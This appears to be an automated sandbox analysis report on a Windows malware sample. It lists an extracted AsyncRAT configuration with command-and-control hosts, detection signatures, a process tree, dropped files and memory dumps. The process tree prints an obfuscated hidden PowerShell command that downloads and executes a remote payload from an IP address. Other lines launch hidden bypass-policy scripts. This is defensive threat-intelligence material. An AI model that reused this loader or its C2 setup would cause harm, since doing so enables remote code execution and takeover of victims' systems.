Analysis
-
max time kernel
142s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
07-02-2024 20:58
Static task
static1
Behavioral task
behavioral1
Sample
2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe
Resource
win7-20231215-en
General
-
Target
2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe
-
Size
155KB
-
MD5
a2be5a2407107605033f2bd305be2e40
-
SHA1
0cc699e4c019627527777744903f75bc2494ef3a
-
SHA256
2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935
-
SHA512
ff211c693680df1ca81a7858dd647afc5cc0be093b985d9c3b20a1693bff069c260e66e2421b79e0711634baed2c6f12a1d905029e82e409c8368c0590bd9b6a
-
SSDEEP
768:8fvdWST3xRbyApqHuDlOHTjXhDnyokke5dfED1ns7csFOyh1cccccccccccgccc8:UvdWSVRVDlOzjRzrksAOUOMv
Malware Config
Extracted
asyncrat
| Edit 3LOSH RAT
test
xfreddy2751.duckdns.org:6606
xfreddy2751.duckdns.org:7707
xfreddy2751.duckdns.org:8808
darkstorm275991.ddns.net:6606
darkstorm275991.ddns.net:7707
darkstorm275991.ddns.net:8808
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_file
License.exe
-
install_folder
%AppData%
Signatures
-
Detect ZGRat V1 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4208-66-0x000001E74C4B0000-0x000001E74C4CA000-memory.dmp family_zgrat_v1 -
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 2 IoCs
Processes:
resource yara_rule behavioral2/memory/5088-68-0x0000000000400000-0x0000000000416000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs behavioral2/memory/4208-69-0x000001E74C520000-0x000001E74C530000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs -
Detects executables packed with ConfuserEx Mod 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4208-66-0x000001E74C4B0000-0x000001E74C4CA000-memory.dmp INDICATOR_EXE_Packed_ConfuserEx -
Detects file containing reversed ASEP Autorun registry keys 3 IoCs
Processes:
resource yara_rule behavioral2/memory/5088-68-0x0000000000400000-0x0000000000416000-memory.dmp INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse behavioral2/memory/4208-69-0x000001E74C520000-0x000001E74C530000-memory.dmp INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse behavioral2/memory/5088-74-0x0000000005320000-0x0000000005330000-memory.dmp INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse -
Blocklisted process makes network request 2 IoCs
Processes:
WScript.exepowershell.exeflow pid process 3 4560 WScript.exe 14 4944 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeWScript.exe2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe -
Executes dropped EXE 1 IoCs
Processes:
CONSOLEAPP1.EXEpid process 1796 CONSOLEAPP1.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4208 set thread context of 5088 4208 powershell.exe RegSvcs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 4944 powershell.exe 4944 powershell.exe 4208 powershell.exe 4208 powershell.exe 4208 powershell.exe 4208 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 4944 powershell.exe Token: SeDebugPrivilege 4208 powershell.exe Token: SeDebugPrivilege 5088 RegSvcs.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exeWScript.exeWScript.execmd.exepowershell.exedescription pid process target process PID 676 wrote to memory of 1796 676 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe CONSOLEAPP1.EXE PID 676 wrote to memory of 1796 676 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe CONSOLEAPP1.EXE PID 676 wrote to memory of 1796 676 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe CONSOLEAPP1.EXE PID 676 wrote to memory of 4560 676 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe WScript.exe PID 676 wrote to memory of 4560 676 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe WScript.exe PID 676 wrote to memory of 4560 676 2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe WScript.exe PID 4560 wrote to memory of 4944 4560 WScript.exe powershell.exe PID 4560 wrote to memory of 4944 4560 WScript.exe powershell.exe PID 4560 wrote to memory of 4944 4560 WScript.exe powershell.exe PID 2452 wrote to memory of 1008 2452 WScript.exe cmd.exe PID 2452 wrote to memory of 1008 2452 WScript.exe cmd.exe PID 1008 wrote to memory of 4208 1008 cmd.exe powershell.exe PID 1008 wrote to memory of 4208 1008 cmd.exe powershell.exe PID 4208 wrote to memory of 1876 4208 powershell.exe RegSvcs.exe PID 4208 wrote to memory of 1876 4208 powershell.exe RegSvcs.exe PID 4208 wrote to memory of 1876 4208 powershell.exe RegSvcs.exe PID 4208 wrote to memory of 5088 4208 powershell.exe RegSvcs.exe PID 4208 wrote to memory of 5088 4208 powershell.exe RegSvcs.exe PID 4208 wrote to memory of 5088 4208 powershell.exe RegSvcs.exe PID 4208 wrote to memory of 5088 4208 powershell.exe RegSvcs.exe PID 4208 wrote to memory of 5088 4208 powershell.exe RegSvcs.exe PID 4208 wrote to memory of 5088 4208 powershell.exe RegSvcs.exe PID 4208 wrote to memory of 5088 4208 powershell.exe RegSvcs.exe PID 4208 wrote to memory of 5088 4208 powershell.exe RegSvcs.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe"C:\Users\Admin\AppData\Local\Temp\2e4db0c8f13972267a53d6d51befde14f0239e35bd0cc3fe60404b5ace7a1935.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE"C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PXDMLEPZSW.WSF"2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://51.195.251.9:222/BR.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Conted.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD58109805611a11b1e1466debd6b616686
SHA1397e1b1de73812033050727a957edc39cc9ad32c
SHA25698bacaf69f25b0381aba14c88972260f68fcef962380e9bb76411db452c8691e
SHA51209b8b04a175dba1aca800a77aa27f6a225513f233c7bec5da7cceee4ef3b5e10ff28b9b251d8e55fc60e1cc78895bbd4f7fdf9fa7dbb1f28aaf4046f747d98d9
-
C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXEFilesize
4KB
MD53facc93eb70a073f208f90955fb055cb
SHA18f04cf5b9c9164f82b7e77034eee62396f6c5bf0
SHA256608c73065d03ab7da0a0b8c8c3db3e073b2403a8d0249b9d684286f58e52dead
SHA512269fb263dd7a2f383c2442a43e98435c4ee0767eab55c77ce5ff2e169089739e746f70208baaac2e4459076596a6afbf3fc8960d1ce9b8f46e91f7e462bd649c
-
C:\Users\Admin\AppData\Local\Temp\PXDMLEPZSW.WSFFilesize
97KB
MD5a704439ce9c5fc9b342e52019c4315cd
SHA1fd846d13920c2d3b788f1e7c7d834ba208404c8a
SHA256bb144eb973c93e0c9b19c52acc40c264e2fcc01518f7a2504d1f11b442f336f9
SHA512e013ce483ce84bfee05f899fd2a317eb2930b41b4a3b14c4cc7efab9c69296580e9d2b2f05c8c55aff2e6cc5940e75f92f3fa3486a2b3e6d415be30d5be424e2
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ohuvpfls.aai.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Public\Conted.batFilesize
199B
MD5e70cce8b1110edb40612b5b14204f4b1
SHA1c4872dc920d20cac95d65cd156d3df1da4e5e2c8
SHA256e76c913a64800a5e756bfdacc103022bcb86e7f8477a8333387660166d161eba
SHA5122a3b9fec13422465ee7b22745343ff5a0d3392a1185bdd239bf32d7df33a7722fab8cb71365889139eeb69aea8ea96c18317dd52863d841d2a3e75a0271a17c4
-
C:\Users\Public\Conted.ps1Filesize
49KB
MD53506ad6ef276791f9b1b0e8de8c92927
SHA1f7bc123c6ccf50924ee91b403bdff9ebbfadddb3
SHA2565aee3b292a4ce52e43219e4c2198230ce3d422cd54f3a642b754e617a12a3977
SHA512a670e6610eb20b1bfede64650a11605eadb3500d1b6e60f44a4a42f177eacb122b4254a1fd68b13b0d3254521607dab61eeb7b3edd2a95c0f6735237a3cdfc76
-
C:\Users\Public\Conted.vbsFilesize
661B
MD5b5e6dbc17075ec5f697166a10970ae47
SHA1b858767affe1a38de4d191b3e56c0db0ae6f049a
SHA25602e51e8b98e6eca20ee0869c44c62724cd287d70c6eed97bf13237feef9b436e
SHA512f3d8198381aa76a8b7de66d81d310488535aac256d68b60739b5921895a6f7836404672990debe8e9f0d43a42f27a78d58e889314b9c82291646679b8969c1c3
-
memory/1796-14-0x0000000000E40000-0x0000000000E48000-memory.dmpFilesize
32KB
-
memory/1796-15-0x00000000743C0000-0x0000000074B70000-memory.dmpFilesize
7.7MB
-
memory/1796-20-0x00000000743C0000-0x0000000074B70000-memory.dmpFilesize
7.7MB
-
memory/4208-66-0x000001E74C4B0000-0x000001E74C4CA000-memory.dmpFilesize
104KB
-
memory/4208-67-0x000001E74C520000-0x000001E74C530000-memory.dmpFilesize
64KB
-
memory/4208-64-0x000001E74C520000-0x000001E74C530000-memory.dmpFilesize
64KB
-
memory/4208-63-0x00007FFC3A3E0000-0x00007FFC3AEA1000-memory.dmpFilesize
10.8MB
-
memory/4208-69-0x000001E74C520000-0x000001E74C530000-memory.dmpFilesize
64KB
-
memory/4208-52-0x000001E74C460000-0x000001E74C482000-memory.dmpFilesize
136KB
-
memory/4208-73-0x00007FFC3A3E0000-0x00007FFC3AEA1000-memory.dmpFilesize
10.8MB
-
memory/4944-26-0x00000000054D0000-0x00000000054F2000-memory.dmpFilesize
136KB
-
memory/4944-27-0x0000000005DC0000-0x0000000005E26000-memory.dmpFilesize
408KB
-
memory/4944-46-0x0000000002E60000-0x0000000002E70000-memory.dmpFilesize
64KB
-
memory/4944-49-0x0000000072F20000-0x00000000736D0000-memory.dmpFilesize
7.7MB
-
memory/4944-41-0x0000000007CA0000-0x000000000831A000-memory.dmpFilesize
6.5MB
-
memory/4944-40-0x0000000006520000-0x000000000656C000-memory.dmpFilesize
304KB
-
memory/4944-39-0x0000000006470000-0x000000000648E000-memory.dmpFilesize
120KB
-
memory/4944-21-0x0000000002EB0000-0x0000000002EE6000-memory.dmpFilesize
216KB
-
memory/4944-38-0x0000000005FA0000-0x00000000062F4000-memory.dmpFilesize
3.3MB
-
memory/4944-42-0x0000000006A10000-0x0000000006A2A000-memory.dmpFilesize
104KB
-
memory/4944-28-0x0000000005E30000-0x0000000005E96000-memory.dmpFilesize
408KB
-
memory/4944-22-0x0000000072F20000-0x00000000736D0000-memory.dmpFilesize
7.7MB
-
memory/4944-25-0x0000000005570000-0x0000000005B98000-memory.dmpFilesize
6.2MB
-
memory/4944-24-0x0000000002E60000-0x0000000002E70000-memory.dmpFilesize
64KB
-
memory/4944-23-0x0000000002E60000-0x0000000002E70000-memory.dmpFilesize
64KB
-
memory/5088-72-0x0000000074A20000-0x00000000751D0000-memory.dmpFilesize
7.7MB
-
memory/5088-68-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/5088-74-0x0000000005320000-0x0000000005330000-memory.dmpFilesize
64KB
-
memory/5088-75-0x0000000005850000-0x00000000058EC000-memory.dmpFilesize
624KB
-
memory/5088-76-0x0000000005EA0000-0x0000000006444000-memory.dmpFilesize
5.6MB